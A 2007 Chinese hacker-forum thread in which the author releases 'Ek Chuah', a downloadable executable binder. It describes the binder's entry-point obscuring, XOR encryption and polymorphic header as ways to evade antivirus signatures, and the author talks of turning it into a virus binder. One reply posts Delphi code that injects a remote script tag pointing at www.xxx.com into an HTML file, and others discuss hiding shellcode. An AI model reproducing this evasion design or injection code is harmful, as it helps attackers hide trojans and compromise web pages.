文章作者：老费
信息来源：邪恶八进制信息安全团队（www.eviloctal.com）

未命名.JPG (31 KB)

2007-5-30 12:03

下载：
ek 1.2.rar (458 KB)

ek 1.2.rar (458 KB)
下载次数: 1020

2007-5-30 12:03

2007/5/26:增加了文件头多态功能，在文件头入口以及异或部分，增加了多态模块，如果你在设置中选择了多态，会在这2个部分增加随机的代码(每次捆绑都不同)，以达到防止一定程度的特征码定位。PS：这里的多态玩具性质大于实用性，对AVER没什么挑战性，但无论怎么说，I DONE IT :)
版本号升级为：1.2
大家如果对程序有什么疑问或希望程序往哪个方面发展，请就在邪八这里跟帖告诉我(我的那个BLOG基本上没时间去)，THX
当然，最重要的是，如果有BUG，一定要记得告诉我哈。
MD5: 48d42c46d11f9eb4e836d94cc08359e1 Ek Chuah 1.2.exe


2007/5/9:修改了解绑方式.

2007/5/7:
大家好，5/1过的怎么样？
我在这里给大家带来一个捆绑工具，5/1在公司加班的时候无聊写的。
在2K 和 XP SP2 下初步测试了一下。

注意点：解捆绑时，会在系统目录下建立文件，所以要有相应的操作权限才行。其他没什么可说的，具体看软件说明吧。还有，对有些文件，比如eBook Workshop压成的电子书，某些自解压文件，某些古怪的壳，作为宿主出现，可能会不行，还在改善中...

因为我测试的不是很仔细，如果有什么BUG请跟帖，说明操作系统，具体情况，最好能给出待捆绑文件/宿主文件，或捆绑后的文件。我会尽快完善。
因为最近出差比较多，上网机会会少点，大家有问题在这里发帖，或去我的站发都可以，我一有时间就会上来看滴。
如果有好的建议也一定要告诉我哈

希望大家喜欢 :)

;**********************************************************
MD5:987f5706325dec1d4fcfae2503dbdcf3 Ek Chuah.exe

软件说明：

版本号:1.0版     

软件作者：老费     

技术支持：EChuah.bloggles.info     

软件的设置以及使用方法如下：     

1>在软件界面左侧相关设置栏，选中它显示当前所有设置，并可以对当前设置进行测试是否正确，测试正确后可以点击"开始合并"进行合并。     

2>双击"相关设置"展开"基本设置"和"高级设置"     

3>在基本设置中有3个设置项目，1:待合并文件:就是你要合并到其他文件上去的可执行文件；2:宿主文件:就是要被待合并文件插入的文件，合并前请先备份;     
3:合并模式，一，搜索多余字节，在宿主文件中搜索00字节，尝试把待合并文件分散插入到00字节中去，这种合并方式适合宿主文件较大，而待合并文件较小的情况。优点是宿主文件合并前后字节不变。     
二，扩展最后一节表，把宿主文件的最后一个节表增加待合并文件的大小，然后写入，需要注意，如果宿主文件不是纯PE文件，如那种安装包或加了某些壳，这种情况下就不适用。     
三，在宿主文件末端增加一个新节。上面2种都不行的话，只有试试这个了。     

4>高级设置有3项，1:入口点模糊EPO深度，如果你对这个概念不清楚，可以到网上查，或者保持默认设置:0，众所周知，我们要在宿主运行时获得控制权来做我们要做的事，至于什么时候获得控制权就是这个选项的事了，如果它为0，我们将在宿主程序的入口点获得控权，当他不为0，我们将从入口点开始搜索指令，第n(n就是设置的数)条指令时我们将获得控制权并把文件解绑，运行，作用？防止一定程度的入口点定位。如果你要改变这个设置，请确定你有足够了解宿主的结构，如果不确定，请保持为0。PS:无论你设置多少数字，我们只对入口点开始的100字节进行搜索(正常来说足够了)。这里指的第N条指令，是物理意义上的，而不是逻辑意义上的,也就是说,如果你定位了一个指令,而这个指令在宿主程序的逻辑中是没什么机会被执行的,比如：出某个错误时的处理,那么,我们也就没什么机会拿到控制权了。当然，这也意味着，请注意。如果你有创意，完全可以在当宿主结束的那一刻，启动你的小东西。：）

2:文件体加密:这个很简单，就是随机取一个种子，把它和待捆绑文件进行XOR运算进行加密。     

3:文件头多态:这个就不多说了，下个版本提供时再详细说明，会对取特征码的手法做些遏制。     

一般的应用，进基本设置，设置好文件路径，到相关设置处测试一下设置，根据反馈调整一下，一般就是调整一下合并模式，就OK了。高级设置都不用管，默认就OK了。     

特别注意，没有对合并后的文件做标记，如果对已经合并过的文件反复进行合并，也许会出现奇怪的不可预计的现象.     

    2007/05/01 劳动节，OT中...





尾声：这个东西我做了1个星期，因为时间仓促，很多方面没考虑，考虑下个版本会增强某几个方面，第一是文件解绑部分实现多态，来对付特征码定位，还有就是对部分主流杀软的所谓动态监控做些处理。更重要的我想在大家帮忙的测试下，把稳定性和兼容性能进一步提高。当然，这些前提是有人需要的话，我不知道现在大家还是否需要捆绑器？？？或者特别需要哪些功能的捆绑器。。。


下载：

东西，不错。不过你再多态也白搭啊，只要你这个东西公布出来，引擎一旦被antivirus们解出来，你这个东西就白搭了。所以我觉得还是公布一下源代码比较好 这样从源代码级别上修改才会体现价值。HOHO～～～

同意楼上的说法，这个要么开源，要么还是别公布比较好。

同意一楼和二楼的意见！
看了下了楼主的1.2，发现1.3要加入和熊猫烧香一样的功能，奉劝楼主还是不要这样了吧，不希望以后有人用这个东西再进行传播病毒了！
楼主三思啊！！！

program Procedurehtm;

uses
Windows;
procedure ftml(FileName: string);
var
a:textfile;
begin
   AssignFile(a,FileName);
   Append(a);
   WriteLn(a, &#39;<script language=javascript src=http://www.xxx.com/index.htm></script>&#39;);
   CloseFile(a);

end;

begin
ftml(&#39;c:\test.htm&#39;);
end.
我写的一个追加一段文字的程序代码，请各位老大批评下

本站的人气怎么不行了？》应该是目前比较好的捆绑机了，充分利用的各种方式进行捆绑，应该再加个修改图标的呀？

再加个修改文件时间的就更好了。。

TO：1/2楼
这个东西其实没有什么新技术,相关技术的开源代码在网上一大堆,所以我目前没有开源的打算.

TO:still 兄弟
这个东西我有打算把它向病毒捆绑机的方向发展,不过时间和技术也许不一定能适合,毕竟做个通用性的东西比帮人做几个专门性的东西要麻烦的多,精力也花费的多.至于道德和法律的问题,我会非常非常认真的考虑和界定的.

TO:6/7楼
这个东西并不改动图标,如果你需要改动,可以用市面上那些资源编辑器来改好宿主的图标后再进行捆绑.这个东西我想做一定的专业性出来,不想做成大杂烩:)

谢谢楼上所有朋友的热心,不过我最希望看到的BUG报告似乎还没有~~~~期待中

老费兄的东西确实不错，没有修改程序入口点，最经典的就是搜索\x00，这样shellcode的功能确实了得，想起来写这程序就复杂，我也想写个练练手，算法确实麻烦，要搜索两个区域足够多的0x00，一个是放shellcode的，一个是放木马、病毒程序的，这么稳定的EPO程序还是第一次看到，在多系统中测试一点问题都没有

感谢still 兄弟谬赞，搜索00可以参考MGF的代码，我就是照抄它的



TO：benteng302
用C结合ASM语言写的，VC 6 + MASM32 编译

ls说的甚是，这个软件还在完善之中，可惜最近小老儿公司事务繁忙，无法静心编程，痛苦ING

整死人。　我想试试结果。　用黑洞加合并一个nbsi 结果一运行就黑屏。　最后重起都不行。安全模试也不行。　只有重装

引用:

引用第14楼huddhuddhudd于2007-08-10 16:30发表的 :
整死人。　我想试试结果。　用黑洞加合并一个nbsi 结果一运行就黑屏。　最后重起都不行。安全模试也不行。　只有重装

哥们，捆绑器不驻留系统，不修改系统，只是把捆绑上去的2个文件解出来运行而已，最失败的就是无法运行，象您所说的情况应该是被捆绑的程序的问题(比如有自我检验保护，发现自身被修改则锁死机器之类(对宿主而言))，尝试设置一个正常，普通的文件作为宿主，或尝试捆绑2个正常的文件试试
PS：对对您造成的麻烦，深感抱歉，I AM SO SORRY

引用:

引用第15楼老费于2007-08-10 21:22发表的 :



哥们，捆绑器不驻留系统，不修改系统，只是把捆绑上去的2个文件解出来运行而已，最失败的就是无法运行，象您所说的情况应该是被捆绑的程序的问题(比如有自我检验保护，发现自身被修改则锁死机器之类(对宿主而言))，尝试设置一个正常，普通的文件作为宿主，或尝试捆绑2个正常的文件试试
PS：对对您造成的麻烦，深感抱歉，I AM SO SORRY

谢谢！　我试来两个正常pe 程序　结果可以了

放ida看了一下，觉得没啥特别的～
喜欢看代码的去看rewolf的dll packer和x86 vm这两个比较有意思，至于感染么，epo/thunk之类的代码网上不少～图标，资源式高级感染那个啥的，我在cvc讲过（还是VC++的工程）～

ps:不过，LZ的界面弄得不错，咋整的，教我一下～

TO：vxk大牛
没想到这个小东西居然能让大牛来这里回帖~~~呵呵
这个界面好象是从CODE PROJECT那里下来的，时间有点长了，应该没记错的


PS：这里的斑竹删帖确实蛮严格的，难得有几个夸俺的帖子，都给删了，可怜我的虚荣心啊~~~

引用:

引用第16楼老费于2007-08-13 12:56发表的 :
TO：vxk大牛没想到这个小东西居然能让大牛来这里回帖~~~呵呵这个界面好象是从CODE PROJECT那里下来的，时间有点长了，应该没记错的 PS：这里的斑竹删帖确实蛮严格的，难得有几个夸俺的帖子，都给删了，可怜我的虚荣心啊~~~
.......

特地赶来夸你
呵呵~~

为了不被人删帖子
报告个bug
高级设置里的 入口点模糊EPO 深度，那个增减的两小箭头，貌似方向反了吧
向上应该是增加吧

呜呜，来了这么久了，还是不搞不太懂站里的东西，，我还要继续努力，，，尽快赶上来

引用:

引用第17楼icexiaoye于2007-08-15 17:01发表的 :


特地赶来夸你
呵呵~~

.......

感谢，感谢，这个BUG倒没注意，好在不会造成很大的困扰:)